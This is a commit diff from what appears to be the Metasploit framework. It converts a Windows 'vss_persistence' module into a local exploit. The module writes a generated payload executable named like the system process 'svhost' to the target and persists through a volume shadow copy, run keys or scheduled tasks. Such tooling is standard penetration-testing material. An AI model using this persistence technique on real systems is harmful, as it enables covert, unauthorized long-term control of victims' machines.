Convert vss_persistence to Local Exploit

2013-10-15 11:11:04 -05:00 · 2013-10-15 11:11:04 -05:00 · 0b9cf24103
parent 3b7be50d50
commit 0b9cf24103
1 changed files with 16 additions and 10 deletions
--- a/modules/exploits/windows/local/vss_persistence.rb
+++ b/modules/exploits/windows/local/vss_persistence.rb
@ -7,14 +7,17 @@

 require 'msf/core'
 require 'rex'
+require 'msf/core/exploit/exe'

-class Metasploit4 < Msf::Post
+class Metasploit3 < Msf::Exploit::Local
+  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::ShadowCopy
  include Msf::Post::Windows::Services
  include Msf::Post::Windows::Registry
+  include Msf::Exploit::EXE

  def initialize(info={})

@ -26,14 +29,17 @@ class Metasploit4 < Msf::Post
        been tested successfully on Windows 7. In order to achieve persistence through the RUNKEY
        option, the user should need password in order to start session on the target machine.
      },
+      'Author'               => ['MrXors <Mr.Xors[at]gmail.com>'],
      'License'              => MSF_LICENSE,
      'Platform'             => ['win'],
      'SessionTypes'         => ['meterpreter'],
-      'Author'               => ['MrXors <Mr.Xors[at]gmail.com>'],
+      'Targets'              => [ [ 'Windows 7', {} ] ],
+      'DefaultTarget'        => 0,
      'References'           => [
        [ 'URL', 'http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html' ],
        [ 'URL', 'http://www.irongeek.com/i.php?page=videos/hack3rcon2/tim-tomes-and-mark-baggett-lurking-in-the-shadows']
-      ]
+      ],
+      'DisclosureDate'=> "Oct 21 2011"
    ))

    register_options(
@ -44,13 +50,11 @@ class Metasploit4 < Msf::Post
        OptBool.new('RUNKEY', [ true, 'Create AutoRun Key for the EXE', false]),
        OptInt.new('DELAY', [ true, 'Delay in Minutes for Reconnect attempt. Needs SCHTASK set to true to work. Default delay is 1 minute.', 1]),
        OptString.new('RPATH', [ false, 'Path on remote system to place Executable. Example: \\\\Windows\\\\Temp (DO NOT USE C:\\ in your RPATH!)', ]),
-        OptPath.new('PATH', [ true, 'Path to Executable on your local system.'])
      ], self.class)

  end

-  def run
-    path = datastore['PATH']
+  def exploit
    @clean_up = ""

    print_status("Checking requirements...")
@ -77,8 +81,8 @@ class Metasploit4 < Msf::Post
      return
    end

-    print_status("Uploading #{path}....")
-    remote_file = upload(path, datastore['RPATH'])
+    print_status("Uploading payload...")
+    remote_file = upload(datastore['RPATH'])

    print_status("Creating Shadow Volume Copy...")
    unless volume_shadow_copy
@ -117,7 +121,7 @@ class Metasploit4 < Msf::Post
    end
  end

-  def upload(file, trg_loc="")
+  def upload(trg_loc="")
    if trg_loc.nil? or trg_loc.empty?
      location = "\\Windows\\Temp"
    else
@ -127,8 +131,10 @@ class Metasploit4 < Msf::Post
    file_name  = "svhost#{rand(100)}.exe"
    file_on_target = "#{location}\\#{file_name}"

+    exe = generate_payload_exe
+
    begin
-      upload_file("#{file_on_target}","#{file}")
+      write_file("#{file_on_target}", exe)
    rescue ::Rex::Post::Meterpreter::RequestError => e
      fail_with(Failure::NotFound, e.message)
    end